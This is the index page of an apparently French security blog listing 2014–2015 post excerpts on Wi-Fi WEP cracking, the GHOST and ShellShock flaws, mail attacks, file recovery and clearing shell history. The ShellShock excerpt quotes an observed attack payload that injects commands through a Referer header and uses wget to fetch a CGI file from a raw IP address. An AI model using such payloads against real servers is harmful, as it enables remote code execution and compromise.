Dyrk.org
Do You Really Know

Une suite à Beini

Publié le 4 juin 2015 par #ro0t

  Bon alors, je ne vais pas vous le cacher, je suis un grand fan de la distribution « Beini » qui est grosso merdo votre plus grand ami pour auditer le Wifi   Notamment avec la célèbre application Feeding Bottle (biberon) qui automatise le processus de « cassage » d’une clé WEP, en vous affichant (via une jolie […]


[ Lire la suite ... ]

Projet MUK – Magic Usb Key

Publié le 22 février 2015 par #ro0t

Hello Hello !     Bon désolé pour le manque d’article en ce moment, je suis vraiment chargé entre la construction de ma maison qui touche à sa fin et mon mariage qui se rapproche, plus mes projets d’a coté et ma recherche d’emploi ….     Bref pour me faire pardonner, je vous offre […]


[ Lire la suite ... ]

Récupérer vos fichiers après un formatage

Publié le 17 février 2015 par #ro0t

    Il peut arriver, par erreur, ou suite à un malheureux bug que vous perdiez l’ensemble ou une partie de vos données.   N’allez pas vous pendre, il est possible de récupérer une partie voir peut être l’ensemble de vos fichiers.   Imaginez votre disque dur comme une table, sur laquelle, vous posez au […]


[ Lire la suite ... ]

Faille GHOST

Publié le 2 février 2015 par #ro0t

    La dernière faille « sévère » en date pour les serveurs linux, impacte directement glibc, qui est indirectement utilisée par tout un tas de chose ^^ Mais là ou se situe le vrai danger, est que les fonctions concernées sont gethostbyname et gethostbyaddress qui convertissent un nom de domaine « toto.com » en adresse ip XX.XX.XX.XX en interrogeant les dns.   […]


[ Lire la suite ... ]

Attention à votre éditeur de fichier lors d’un audit.

Publié le 27 janvier 2015 par #ro0t

Salut à tous,   Juste pour rappel, j’avais écris il y a quelques temps un article sur les failles que pouvaient générer certains éditeurs de fichier, via les fichiers temporaires créés lorsque vous éditiez un fichier. [ Piqûre de Rappel] Sécurité Web : Attention à votre éditeur de fichier https://dyrk.org/2014/12/30/securite-web-attention-a-votre-editeur-de-fichier/   Néanmoins, je souhaite vous parler […]


[ Lire la suite ... ]

Les attaques mails … un calvaire pour les hébergeurs …

Publié le 9 décembre 2014 par #ro0t

Coucou les amis, Aujourd’hui nous allons aborder un angle peu connu du grand public … les attaques mails … Alors on n’est en droit de se poser la question … en quoi un mail peut il être dangereux …. Laisser moi donc vous illustrer par un exemple bien concret …   Vous avez un site […]


[ Lire la suite ... ]

Effacer les traces de votre passage d’un serveur

Publié le 30 novembre 2014 par #ro0t

  Bon alors dans l’idée, la commande « history » permet de lister les dernières actions qui ont été faites sur votre serveur … Et … parfois c’est un peu gênant … On souhaiterait que personne ne sache ce que l’on  a fait …   En générale c’est surtout les pirates qui ont recours à la vidange […]


[ Lire la suite ... ]

Linux : Qui est connecté sur mon serveur ? Comment le kicker ?

Publié le 27 novembre 2014 par #ro0t

  Bon alors j’écris cet article simplement car j’ai découvert la commande « w » qui est grosso merdo un équivalent de whois avec un affichage un peu plus complet et en colonne ^^ et bon je voulais juste vous parler de cette commande, et finalement je l’ai raccroché au thème de la sécurité …   En […]


[ Lire la suite ... ]

Exploitation de ShellShock sur Dyrk

Publié le 5 octobre 2014 par #ro0t

  Pour les curieux de la faille shellshock, voici quelques type d’exploitation que certaine personne emploies pour essayer de faire tomber mon serveur : L’attaquant forge une requête curl ou il indique au referer d’être : () { :; }; echo Content-type:text/plain; echo; echo; echo M`expr 1330   7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi; chmod 755 […]


[ Lire la suite ... ]

Une vulnérabilité qui génère un ras de marée sur les serveurs linux

Publié le 25 septembre 2014 par #ro0t

Comme la faille HeartBleed qui touchait le ssl, une nouvelle vulnérabilité « ShellShock « vient de voir le jour d’autant plus grave, elle concerne bash, qui est entre guillemet le moteur qui execute vos commandes. A priori, on peut déclarer des instructions en mémoire, et dès lors qu’on appel bash après, hop les instructions sont exécutés. Bash, ou […]


[ Lire la suite ... ]